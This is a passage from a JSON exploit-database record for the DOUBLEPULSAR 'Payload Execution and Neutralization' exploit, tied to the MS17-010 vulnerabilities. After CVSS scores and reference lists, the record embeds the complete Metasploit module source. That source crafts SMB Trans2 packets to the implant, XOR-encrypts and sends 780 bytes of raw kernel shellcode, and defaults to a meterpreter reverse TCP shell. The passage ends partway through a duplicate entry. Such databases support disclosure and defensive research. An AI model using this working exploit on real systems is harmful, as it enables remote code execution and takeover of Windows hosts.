"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-11-01T00:14:28", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-01T00:14:28", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-01T00:14:28", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-01] #"}, "lastseen": "2021-11-01T00:14:28", "differentElements": ["sourceData"], "edition": 62}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "afbf230ebbf00fdade8aac2595d741bf", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-11-01T22:21:46", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", 